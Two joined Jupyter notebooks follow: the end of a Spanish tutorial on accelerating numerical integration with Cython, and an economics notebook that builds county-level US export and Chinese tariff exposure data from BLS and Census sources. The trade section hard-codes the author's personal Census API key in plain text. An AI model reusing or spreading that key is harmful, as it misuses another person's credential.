err_relativo(aprox,obj) ``` **Ejercicio:** investigar por qué se tiene un error relativo del orden de $10^{-7}$ y no de mayor precisión como se verá más abajo con el archivo `Rcf_cython2.pyx`. 
``` %timeit -n 5 -r 10 Rcf_compiled.Rcf(f,0,1,n) ``` **Obs:** El error relativo anterior es más grande del que se obtenía anteriomente, por ello se utilizará el módulo `cythonize` (haciendo pruebas e investigando un poco se obtuvo la precisión de antes). ``` %%file Rcf_cython2.pyx def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res %%file setup2.py from distutils.core import setup from Cython.Build import cythonize setup(ext_modules = cythonize("Rcf_cython2.pyx", compiler_directives={'language_level' : 3}) ) #es posible que la solución del ejercicio anterior tenga que ver con el Warning #y uso de la directiva language_level %%bash python3 setup2.py build_ext --inplace import Rcf_cython2 n=10**6 start_time = time.time() aprox=Rcf_cython2.Rcf(f,0,1,n) end_time = time.time() aprox secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) ``` Revisar error relativo: ``` err_relativo(aprox,obj) ``` ## Vía el comando magic `%cython` ``` %load_ext Cython %%cython def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. 
Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res n=10**6 start_time = time.time() aprox=Rcf(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf(f,0,1,n) ``` # Cython Annotations para analizar un bloque de código Cython tiene una opción de *annotation* que generará un archivo con extensión `.html` que se puede visualizar en jupyterlab o en un browser. Cada línea puede ser expandida haciendo un doble click que mostrará el código C generado. Líneas más amarillas refieren a más llamadas en la máquina virtual de Python (por máquina virtual de Python entiéndase la maquinaria que utiliza Python para traducir el lenguaje de alto nivel a [bytecode](https://en.wikipedia.org/wiki/Bytecode) ), mientras que líneas más blancas significan "más código en C y no Python". El objetivo es remover la mayor cantidad de líneas amarillas posibles (pues típicamente son costosas en tiempo y si las líneas están dentro de loops son todavía más costosas) y terminar con códigos cuyas annotations sean lo más blancas posibles. Concentra tu atención en las líneas que son amarillas y están dentro de los loops, no pierdas tu tiempo en líneas amarillas que están fuera de loops y que no causan una ejecución lenta (para identificar esto perfila tu código). ## Vía línea de comando: ``` %%bash $HOME/.local/bin/cython -a Rcf_cython.pyx ``` Ver archivo creado: `Rcf_cython.html` ## Vía comando de magic y flag `-a`: ``` %%cython? 
%%cython -a def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/0fjkhg66rl0v2n0/output_cython_1.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. **Obs:** para este ejemplo la línea $18$ es muy amarilla y está dentro del loop. Recuérdese de la nota [1.6.Perfilamiento_Python.ipynb](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.6.Perfilamiento_Python.ipynb) que es una línea en la que se gasta parte del tiempo total de ejecución del código. Una primera opción que tenemos es crear los nodos para el método de integración dentro del loop y separar el llamado a la *list comprehension* `nodes=[a+(i+1/2)*h_hat for i in range(0,n)]`: ``` %%cython -a def Rcf2(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. 
Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=f(x) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/d5atbbiivsh2mgk/output_cython_2.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf2(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf2 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf2(f,0,1,n) ``` **Obs:** para este ejemplo las líneas $17$ y $18$ son muy amarillas y están dentro del loop. Además son líneas que involucran tipos de datos que no cambiarán en la ejecución de cada loop. Nos enfocamos a hacerlas más blancas... Una primera opción es **declarar los tipos de objetos** que están involucrados en el loop utilizando la sintaxis `cdef`: ``` %%cython -a def Rcf3(f,double a,double b,unsigned int n): #obsérvese la declaración de los tipos """ Compute numerical approximation using rectangle or mid-point method in an interval. 
Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ cdef unsigned int i #obsérvese la declaración de los tipos cdef double x,sum_res, h_hat #obsérvese la declaración de los tipos h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=f(x) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/ttxyxbkbmtxptdt/output_cython_3.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf3(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf3 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf3(f,0,1,n) ``` **Obs:** al definir tipos éstos sólo serán entendidos por Cython y **no por Python**. Cython utiliza estos tipos para convertir el código de Python a objetos de C, éstos objetos no tienen que convertirse de vuelta a objetos de Python. Entonces perdemos flexibilidad pero ganamos velocidad. Y podemos bajar más el tiempo al definir la función que será utilizada: ``` %%cython -a import math def Rcf4(double a,double b,unsigned int n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. 
Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ cdef unsigned int i cdef double x,sum_res, h_hat h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=math.exp(-x**2) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/a5upwaoveixxuza/output_cython_4.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf4(0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf4 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf4(0,1,n) ``` **Obs:** estamos ganando velocidad pues el compilador de C `gcc` puede optimizar funciones de bajo nivel para operar en los bytes que están asociados a las variables y no realiza llamadas a la máquina virtual de Python. **Ejercicios** 1. Realiza el análisis con las herramientas revisadas en esta nota para las reglas del trapecio y de Simpson de la nota [1.5.Integracion_numerica](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.5.Integracion_numerica.ipynb). **Referencias** 1. M. Gorelick, I. Ozsvald, High Performance Python, O'Reilly Media, 2014.
github_jupyter
### Trade and Tariff Dataset at the County level This notebook constructs a trade and county-level tariff data, over time, dataset. **This is a core notebook to the project** so I will try and explain each step clearly. This is one aspect of my code to be scrutinized. It outputs the county-level trade and tariff dataset as a `.parquet` file. ``` import pandas as pd # data package import matplotlib.pyplot as plt # graphics import datetime as dt import numpy as np import requests, io # internet and input tools import zipfile as zf # zip file tools import os #import weightedcalcs as wc #import numpy as np import pyarrow as pa import pyarrow.parquet as pq file_path = os.getcwd() fig_path = file_path +"\\figures" ``` ### Step 1 Grab and manipulate the county level data for 2017 So we will grab the single file, then adjust it to suit our needs. The needs are to construct county-level employment weights to create a trade exposure metric and tariff metric for each county. ``` print("") print("**********************************************************************************") print("Downloading and processing BLS file") print("") url = "https://data.bls.gov/cew/data/files/2017/csv/2017_annual_singlefile.zip" # This will read in the annual, single file. It's big, but has all we want... r = requests.get(url) # convert bytes to zip file bls_sf = zf.ZipFile(io.BytesIO(r.content)) print('Type of zipfile object:', type(bls_sf)) clist = ['area_fips', 'own_code', 'industry_code', 'agglvl_code', 'size_code', 'year', 'disclosure_code', 'annual_avg_estabs', 'annual_avg_emplvl', 'total_annual_wages','avg_annual_pay'] df = pd.read_csv(bls_sf.open(bls_sf.namelist()[0]), usecols= clist) # SHOULD PRESPECIFY TYPES TO df.head() ``` Then the file below cleans stuff up. The most important is the `NAICS_county_level` which selects the NAICS aggregation and then the county aggregation. 
Website describing this is here: [https://data.bls.gov/cew/doc/titles/agglevel/agglevel_titles.htm](https://data.bls.gov/cew/doc/titles/agglevel/agglevel_titles.htm) ``` NAICS_county_level = 75 # This is the code that will select only counties at the 3 digit NAICS level df_county = df[df.agglvl_code == NAICS_county_level].copy() df_county = df_county[df_county.own_code == 5] # Only grab private stuff df_county = df_county[(df_county.area_fips.str[0:2] != "72") & (df_county.area_fips.str[0:2] != "78") & (df_county.area_fips.str[0:2] != "02") & (df_county.area_fips.str[0:2] != "15")] #Drop puerto rico, alaska, hawaii...this mayb not be doing what I think it is...as it looks like these guys are there # Does not matter as analysis is performed withthem, drop them when do the map. df_county["sup_ind"] = df_county.industry_code.str[1].astype(int) # sometimes there are super industries floating around we want to drop them. # not clear if this matters with the conditioning all ready df_county = df_county[df_county["sup_ind"] > 0] df_county.area_fips = df_county.area_fips.astype(str) df_national = df_county.groupby("industry_code").agg({"annual_avg_emplvl": "sum"}) df_national.reset_index(inplace = True) df_national.rename({"annual_avg_emplvl":"nat_emplvl"}, axis = 1, inplace = True) df_national.head() ``` Let's compute annual employment. ``` df_county.annual_avg_emplvl.sum() ``` which matches well with FRED (https://fred.stlouisfed.org/series/USPRIV) in 2017 (off by a couple million) --- ### Step 2 Bring in the trade data Here we will read in data at the HS6 level, exports to china, over time. ``` print("") print("**********************************************************************************") print("Downloading and processing Trade Data") print("") my_key = "&key=34e40301bda77077e24c859c6c6c0b721ad73fc7" # This is my key. I'm nice and I have it posted. If you will be doing more with this # please get your own key! 
end_use = "hs?get=E_COMMODITY,CTY_CODE,ALL_VAL_MO,CTY_NAME" url = "https://api.census.gov/data/timeseries/intltrade/exports/" + end_use url = url + my_key + "&time==from+2015-01" + "&COMM_LVL=HS6" url = url + "&CTY_CODE=5700" r = requests.get(url) df_china_trade = pd.DataFrame(r.json()[1:]) # This then converts it to a dataframe # Note that the first entry is the labels df_china_trade.columns = r.json()[0] df_china_trade.time = pd.to_datetime(df_china_trade.time, format="%Y-%m") # This is so I can call this correctly... df_china_trade["china_trade"] = df_china_trade.ALL_VAL_MO.astype(float) df_china_trade.E_COMMODITY = df_china_trade.E_COMMODITY.astype(str) df_china_trade.tail(10) ``` Now grab **total exports** (not just China) by HS6 level, overtime. ``` r end_use = "hs?get=E_COMMODITY,ALL_VAL_MO" url = "https://api.census.gov/data/timeseries/intltrade/exports/" url = url + end_use + my_key + "&time==from+2015-01" + "&COMM_LVL=HS6" r = requests.get(url) df_all_trade = pd.DataFrame(r.json()[1:]) # This then converts it to a dataframe # Note that the first entry is the labels df_all_trade.columns = r.json()[0] df_all_trade.time = pd.to_datetime(df_all_trade.time, format="%Y-%m") # This is so I can call this correctly... df_all_trade["total_trade"] = df_all_trade.ALL_VAL_MO.astype(float) df_all_trade.E_COMMODITY = df_all_trade.E_COMMODITY.astype(str) df_all_trade.head(10) ``` Then combine the china trade and the all trade dataset. ``` dftrade = df_all_trade.merge(df_china_trade[["E_COMMODITY", "time","china_trade"]], left_on = ["E_COMMODITY", "time"], right_on = ["E_COMMODITY", "time"], how = "left") dftrade.set_index("time", inplace = True) dftrade.drop(["ALL_VAL_MO"], axis = 1, inplace = True) ``` --- ### Step 3 Bring in concordance, create annual and national data set. Assign Naics codes, create a annual 2017 `df`, create the trade wieghts by naics so we can aggregate the tariffs. 
```
dftrade_17 = dftrade.loc["2017"].groupby("E_COMMODITY").agg({"china_trade":"sum"})
```

Use the concordance from the US Census to go from HS6 to NAICS. In the code below there are two different approaches to working with the concordance. The latter one makes more sense. Ultimately it does not matter.

```
#url = "https://www.census.gov/foreign-trade/reference/codes/concordance/expconcord17.xls"

#df_concordance = pd.read_excel(url, dtype = {"commodity": str, "naics": str})

#df_concordance["hs8"] = df_concordance.commodity.str[0:8] # truncate down to get the hs8
#df_concordance["hs6"] = df_concordance.commodity.str[0:6] # truncate down to get the hs6
#df_concordance["naics3"] = df_concordance["naics"].str[0:3]

#dict_concordance = dict(zip(df_concordance.hs6,df_concordance.naics))
# This creates a dictionary from which we can map the hs6 to the naics codes

# Full disclosure. There is an issue with the creation of the dictionary as a unique
# mapping from hs6 to naics. The notebook ``alt_hs_naics_mapping.ipynb'' provides a complete discussion.
# Ultimately, this does not matter for the results (relative to the alternative below)

# Below is a fix/alternative approach to creating the mapping from hs6 to naics. In the
# cases where there are multiple naics codes for each hs6 code, it assigns the naics code that is
# associated with the most trade.
# For future reference check this out: https://www.bea.gov/industry/zip/NDN0317.zip file_path = os.getcwd() alt_concordance = pq.read_table(file_path + "\\data\\alt_concordance.parquet").to_pandas() alt_concordance.head() dict_concordance = dict(zip(alt_concordance.hs6,alt_concordance.naics)) ``` Then create this at different levels ``` dftrade_17["hs6"] = dftrade_17.index dftrade_17["naics"] = dftrade_17["hs6"].map(dict_concordance) dftrade_17["naics4"] = dftrade_17["naics"].str[0:4] dftrade_17["naics3"] = dftrade_17["naics"].str[0:3] dftrade_17.rename({"china_trade":"2017_china_trade"}, axis = 1, inplace = True) dftrade_17.head() ``` This look good, we have the commodity (as the index), chinese trade, and then different codes to map stuff to. Here we will work at the NAICS 3 digit level. The rational for this is that if you go more disaggregate, then confidentialy issues lead to employment at the county-level to be drpoed from the QECW. This is just a simple ``.groupby`` operation. ``` dftrade_17_naics3 = dftrade_17.groupby("naics3").agg({"2017_china_trade": "sum"}) dftrade_17_naics3.head() ``` Now merge this with the national employment by naics data set. ``` df_national = df_national.merge(dftrade_17_naics3["2017_china_trade"], left_on = "industry_code", right_index = True, how = "left") df_national["2017_china_trade"].replace(np.nan, 0, inplace = True) df_national["trd_wts"] = (df_national["2017_china_trade"]/df_national["2017_china_trade"].sum()) ``` Then check to make sure that the trade weights sum up to one. ``` df_national.trd_wts.sum() dftrade["hs6"] = dftrade.E_COMMODITY dftrade["naics"] = dftrade["hs6"].map(dict_concordance) dftrade["naics4"] = dftrade["naics"].str[0:4] dftrade["naics3"] = dftrade["naics"].str[0:3] ``` --- ### Step 4 Add in the tariff data... Now here is one of the harder parts. We want to take the time series data, then layer on the tariff data by product and time. 
So we will have a big data frame that is (at HS6 level) over time, but each unit of observation has the associated 2017 annual value and the tariff at that date. So we will use the `map` function to exploit this. ``` #tariffs = pd.read_csv("tariff_list_naics.csv", dtype = {"HS-8 code": str,"HS6": str,"naics": str,"naics4": str}) file_path = os.getcwd() + "\\data" # bring in the tariff data tariffs = pd.read_csv(file_path + "\\new_tariff_list_max.csv", dtype = {"hs6": str}) # This is the tariff dataset created by updated_tariff_data.ipynb (note the max tariff means taking the largest value # when going from Chinese hs10 to hs6. This does not matter, if anything gives more conservative resutls) tariffs.time_of_tariff = pd.to_datetime(tariffs.time_of_tariff, format="%Y-%m") # make sure the time is there. tariffs.set_index("time_of_tariff",inplace = True) tariffs.head() ``` Then we create dictionaries to do the following " you tell me HS, I tell you tariff" by time. ``` initial_tariff = dict(zip(tariffs.loc["2018-01-01"].hs6,tariffs.loc["2018-01-01"].tariff)) # These are the initial mfn tariffs. We will apply these from 2017 up untill the changes... tariff_dict_232 = dict(zip(tariffs.loc["2018-04-02"].hs6,tariffs.loc["2018-04-02"].tariff)) #These are the section 232 tariffs, response to US steel and aluminum. 
tariff_dict_r1 = dict(zip(tariffs.loc["2018-07-06"].hs6,tariffs.loc["2018-07-06"].tariff)) #tariff_dict_r1 = dict(zip(tariffs.loc["2018-07-06"].HS6,tariffs.loc["2018-07-06"].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff tariff_dict_r2 = dict(zip(tariffs.loc[dt.datetime(2018,8,23)].hs6,tariffs.loc[dt.datetime(2018,8,23)].tariff)) #tariff_dict_r2 = dict(zip(tariffs.loc[dt.datetime(2018,8,23)].HS6,tariffs.loc[dt.datetime(2018,8,23)].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff, round 2 tariff_dict_r3 = dict(zip(tariffs.loc[dt.datetime(2018,9,24)].hs6,tariffs.loc[dt.datetime(2018,9,24)].tariff)) #tariff_dict_r3 = dict(zip(tariffs.loc[dt.datetime(2018,9,24)].HS6,tariffs.loc[dt.datetime(2018,9,24)].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff, round 3 tariff_dict_mfn = dict(zip(tariffs.loc["2018-11-01"].hs6,tariffs.loc["2018-11-01"].tariff)) # This reflects mfn adjustments that China made later in the year. tariff_dict_mfn_2019 = dict(zip(tariffs.loc["2019-01-02"].hs6,tariffs.loc["2019-01-02"].tariff)) # This reflects mfn adjustments and auto adjustment China made at the start of 2019 ``` Then assign the tariffs to the hs6 codes. As mentioned below, the ``.update`` function updates the product code with a new tariff if there is one in the new dictionary. ``` dftrade["tariff"] = 0 # Then use the map function which will fill in the tariff in the correct places.. # Note the key issue was that the dictionaries were overwritting stuff, hence # the update... # Start with the MFN... 
dftrade.loc["2015-01":,"tariff"] = dftrade.loc["2015-01":,"hs6"].map(initial_tariff) #print("done") # Now update given the 232 response initial_tariff.update(tariff_dict_232) dftrade.loc["2018-04":,"tariff"] = dftrade.loc["2018-04":,"hs6"].map(initial_tariff) #print("done") # This is the big Phase 1 of the war initial_tariff.update(tariff_dict_r1) dftrade.loc["2018-07":,"tariff"] = dftrade.loc["2018-07":,"hs6"].map(initial_tariff) #print("done") # Here is phase 2 initial_tariff.update(tariff_dict_r2) dftrade.loc["2018-09":,"tariff"] = dftrade.loc["2018-09":,"hs6"].map(initial_tariff) #print("done") # Here is phase 3 initial_tariff.update(tariff_dict_r3) dftrade.loc["2018-10":,"tariff"] = dftrade.loc["2018-10":,"hs6"].map(initial_tariff) #print("done") # China then adjusts the mfn initial_tariff.update(tariff_dict_mfn) dftrade.loc["2018-11":,"tariff"] = dftrade.loc["2018-11":,"hs6"].map(initial_tariff) #print("done") # An update on the mfn's initial_tariff.update(tariff_dict_mfn_2019) dftrade.loc["2019-01":,"tariff"] = dftrade.loc["2019-01":,"hs6"].map(initial_tariff) dftrade["tariff"] = dftrade["tariff"].replace(np.nan,0) dftrade[dftrade["tariff"] == 25].head() dftrade["2018-08"].head(25) ``` This is looking good, not how you can see the tariffs (in august of 2018) hitting in the right places. Now merge it with the 2017 annual trade data so we can construct trade weighted averages of tariffs.... ``` dftrade = dftrade.merge(dftrade_17["2017_china_trade"], how = "inner", left_on = "E_COMMODITY", right_index = True) dftrade[dftrade.naics3 == "111"].sort_values(by = ["tariff"], ascending = False) ``` Looks like we accomplished this task. Now what we will do is create a function which will make the trade weighted verage of the tariff rates as we aggregate across product codes. ``` def trd_weighted_avg(df): # A function to create the trade weighted average of the tariff rates # by round... 
trd_w_avg = df["tariff"].multiply(df["2017_china_trade"],axis = 0).sum() # here wuse the 2017 annual values to weight it trd_w_avg = trd_w_avg / df["2017_china_trade"].sum() foo = {"tariff_trd_w_avg": [trd_w_avg ], "total_trade": df["total_trade"].sum(), "china_trade" : df["china_trade"].sum()} return pd.DataFrame(foo) ``` Now, `groupby` time and NAICS code (in this case 3), apply the trade weighted function above. Then the resulting data frame should be time, and naics tariffs and the total trade. ``` grp = dftrade.groupby(["time","naics3"]) exp_trf_bynaics = grp.apply(trd_weighted_avg) exp_trf_bynaics = exp_trf_bynaics.droplevel(2) exp_trf_bynaics.loc["2018-01"].head(15) fig, ax = plt.subplots(figsize = (12,8)) mike_blue = tuple(np.array([20, 64, 134]) / 255) tariffs_over_time = exp_trf_bynaics.groupby(["time"]).agg({"tariff_trd_w_avg": "mean"}) ax.plot(tariffs_over_time, alpha = 0.95, color = mike_blue, linewidth = 4) #ax.plot(auto_least, alpha = 0.95, color = mike_blue, linewidth = 4, # label = 'Difference between top and bottom\nquartile of county level Chinese tariff exposure') #ax.plot(, alpha = 0.95, color = mike_blue , linewidth = 4, # label = 'Bottom Quantile of Chinese Tariff Exposure Counties') ax.set_xlim(dt.datetime(2017,3,1),dt.datetime(2019,1,1)) ax.spines["right"].set_visible(False) ax.spines["top"].set_visible(False) ax.yaxis.grid(alpha= 0.5, linestyle= "--") label_descrip = "Tariff" ax.set_ylabel(label_descrip, fontsize = 14) ax.axvline(dt.datetime(2017,4,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2017,8,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,3,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,4,4), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,7,6), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,8,23), linewidth = 2, ls = "--", color = 'k', alpha =0.25) 
ax.axvline(dt.datetime(2018,9,24), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,12,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.set_title("Average Chinese Tariff on US Exports", fontsize = 16, loc= "left" ) ############################################################################################## ax.annotate( "4/2018: US announces intention\nto impose 301 tariffs on China", xy=(dt.datetime(2018,4,3), 7), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,5,3), 8), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=0,angleB=45", "color": "black", "alpha": 0.55 }, fontsize=11, ) ############################################################################################## ax.annotate( "7/2018: China imposes first phase of\nretaliatory tariffs", xy=(dt.datetime(2018,7,6), 9), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,6,3), 10), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=345,angleB=50", "color": "black", "alpha": 0.55 }, fontsize=11, ) ################################################################################### ax.annotate( "8-9/2018: China imposes second and \nthird phases of retaliatory tariffs", xy=(dt.datetime(2018,8,23), 12), color='white',# This is where we point at... 
xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,9,3), 12), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=345,angleB=80", "color": "black", "alpha": 0.55 }, fontsize=11, ) ################################################################################### ax.annotate( "8-9/2018: China imposes second and \nthird phases of retaliatory tariffs", xy=(dt.datetime(2018,9,24), 16), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,9,3), 12), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=3,angleB=36", "color": "black", "alpha": 0.55 }, fontsize=11, ) ############################################################################################## ############################################################################################## # if not os.path.exists(fig_path): os.makedirs(fig_path) plt.savefig(fig_path + "\\tariffs_time.pdf", bbox_inches = "tight", dip = 3600) plt.show() ``` This simple plot looks a lot like the Bowen figures. Note that the dip is all about China changing their MFN tariffs in (what appears to be) certain consumer orinted catagories as Bowen point out. So clothing stuff falls, while they are hammering the ag. products. Looks like we accomplished this task. Just a couple of things to clean up then we are ready to move onto the next step. ``` exp_trf_bynaics["time"] = exp_trf_bynaics.index.get_level_values(0) exp_trf_bynaics = exp_trf_bynaics.droplevel(level=0) exp_trf_bynaics.loc["111"] ``` --- ### Step 3 Merge trade data with the county data This is the most time consuming step (interms of compuation time). 
So start with the county data set, `groupby` county, then apply a function which will create (i) time varying exports (which are constructed with the 2017 weightes) and (ii) time varying tariffs (also constructed using the 2017) weights. The final want is a big dataframe that has county, time, export exposure and tariff exposure. ``` print("") print("**********************************************************************************") print("Constructing County-Level Tariffs and Exports") print("") grp = df_county.groupby("area_fips") # This creates groups at the county level. # Let's just look at one of the groups... grp.get_group("1001").head() ``` Below are the two key functions that deliver this. Basically it does the following: - Take a group at county level, merge it with the national level data set, so the resulting `df` has the county and nation. - Create the weights. - Then merge it with the exports, this will now be a df with exports varying over time, but with the fixed weights associated with each entry. - Then aggregate the national exports by NAICS by the county level weights, giving a county level time series of exports. --- **Updates** - The tariff measure does the following: fix a county, take employment in industry $i$ and divide by total county employment, then sum up tariffs across industries with the weights being the county level share. The idea here is if all employment in a county is soy, then the "effective" tariff that the county faces is the soy tariff. In equation terms: here $c$ is county, $s$ is industry, $n$, below is nation. $\tau_{c,t} = \sum_{s\in S}\frac{L_{c,s}}{L_{c,S}} \tau_{s,t}$ Note that below, I make one further adjustment to make sure that $L_{c,S}$ is for all employment, not just the sum across $L_{c,s}$ - The export measure: What am I doing: take a county's employment in industry $i$ and divide by **national** level employment in industry $i$. 
Then a "county's" exports is the the sum across industries, weighted by the county's share of national employment in each industry. The idea here is, if a county's has all national level employment in an industry, all that industries exports will be assigned to that county. $\mbox{EX}_{c,t} = \frac{1}{L_{c,S,2017}}\sum_{s\in S}\frac{L_{c,s,2017}}{L_{n,s,2017}} \mbox{EX}_{s,t}$ and then I divide by total employment in the county to have a county per worker measure. This is done for exports to China and then export in total. Note that below, I make one further adjustment to make sure that $L_{c,S}$ is for all employment, not just the sum across $L_{c,s}$ ``` def create_trade_weights(df): # Takes in the county groupings and will return, for each county, a time series of export # exposure, tariffs, and other statistics. new_df = df.merge(df_national[["nat_emplvl", "industry_code", "trd_wts"]], how = "outer", left_on = "industry_code", right_on = "industry_code") # Merge the nation with the county, why, we want to make sure all the naics codes are lined up properly new_df["emp_wts"] = (new_df.annual_avg_emplvl/new_df.nat_emplvl) # create the weights... foo_df = exp_trf_bynaics.merge(new_df[["emp_wts","trd_wts", "industry_code", "annual_avg_emplvl"]], left_index = True, right_on = "industry_code") # Now each weight is for a NAICS code, we will merge it with the export trade data set, so for all naics, all time... # This is a big df whith all trade data and then the county's weights for each naics code foo_grp = foo_df.groupby("time") # group by time. foo = foo_grp.apply(trade_by_naics) # Then for each time gropuing, we aggregate across the naics codes according to the weights above. foo = foo.droplevel(1) foo["fips"] = df["area_fips"].astype(str).iloc[0] # some cleaning of the df foo["total_employment"] = new_df.annual_avg_emplvl.sum() # get total employment. 
return pd.DataFrame(foo) def trade_by_naics(df): # Simple function just to test about aggregation china_exp_pc = (1/df["annual_avg_emplvl"].sum())*(df["china_trade"]*df["emp_wts"]).sum() total_exp_pc = (1/df["annual_avg_emplvl"].sum())*(df["total_trade"]*df["emp_wts"]).sum() # the first term multiplies trade by the county's share of national level employment # then the outside term divides by number of workers in a county. #tariff_nwt_pc = (1/df["annual_avg_emplvl"].sum())*(df["tariff_trd_w_avg"]*df["emp_wts"]).sum() # This is the measure that makes most sense, need to justify it... tariff = ((df["annual_avg_emplvl"]*df["tariff_trd_w_avg"])/df["annual_avg_emplvl"].sum()).sum() # local employment share weighted tariff. So if all guys are in area are working in soy, # then they are facing the soybean tariff.... foo = {"total_exp_pc": [total_exp_pc], "china_exp_pc": [china_exp_pc], "tariff": [tariff], "emplvl_2017": df["annual_avg_emplvl"].sum()} return pd.DataFrame(foo) ``` Then apply the function to the county groups ``` trade_county = grp.apply(create_trade_weights) ``` And we are done and output the file to where we want it ``` trade_county.sort_values(by = ["tariff","emplvl_2017"], ascending = False).head(25) ``` **One more adjustment.** Notice that in the function, when we are merging, we are droping all the NAICS codes without trade. So these measures (total trade, china trade, and tariffs) are only conditional on being traded. This only matters in so far as the denominator, the ``df["annual_avg_emplvl"].sum()`` is concerned. To make the adjustment then, we multiply the employment measure in the denominator and then divide through by the ``total_employment`` measure. 
